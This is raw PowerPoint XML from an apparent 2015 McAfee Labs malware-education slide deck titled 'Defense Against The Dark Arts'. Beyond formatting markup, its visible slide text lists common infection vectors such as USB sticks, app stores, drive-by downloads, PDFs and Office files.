          <a:latin typeface="Franklin Gothic Medium"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="456888" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="913775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1370664" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1827552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="172921" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="800"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="200"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="569523" indent="-223684" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="200"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="915363" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="200"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1311966" indent="-225272" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="200"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1660979" indent="-228444" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="200"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2117867" indent="-228444" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2574755" indent="-228444" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3031642" indent="-228444" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3488531" indent="-228444"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3775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="456888" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="913775" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1370664" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1827552" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2284439" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2741327" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3198216" algn="l" defTabSz="913775" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3655104" algn="l" defTabSz="91377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hyperlink" Target="http://www.microsoft.com/security/portal/mmpc/shared/malwarenaming.aspx"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="VirusTotal.htm" TargetMode="External"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="Malwr.htm" TargetMode="External"/><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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.jpeg"/><Relationship Id="rId10"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mailto:craig_schmugar@mcafee.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Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1787840" y="2960559"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense Against The Dark Arts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777998" y="3878645"/>
            <a:ext cx="2946401" cy="430883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Christiaan Beek (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ChristiaanBeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>IntelSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> /McAfee Labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1787837" y="3327958"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91377" tIns="45689" rIns="91377" bIns="45689" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1066"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2100" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="759263" indent="-298206" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="–"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1220321" indent="-230530" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="•"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1749055" indent="-300322" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="–"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2214343" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr sz="1900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2823446" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3432549" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4041650" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4650754" indent="-304552" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="0" dirty="0" smtClean="0"/>
              <a:t>January  2015</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364370591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z="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The biggest infection vector:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43011" name="Picture 6" descr="http://www.chris-alexander.co.uk/wp-content/uploads/2010/03/pebkac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28751"/>
            <a:ext cx="6319838" cy="3164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23518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z="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other infection vectors:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1200150"/>
            <a:ext cx="6934200" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>USB sticks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mobile App stores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Drive-by downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PDF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Office files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="1885950"/>
            <a:ext cx="5500913" cy="16846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2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3638550"/>
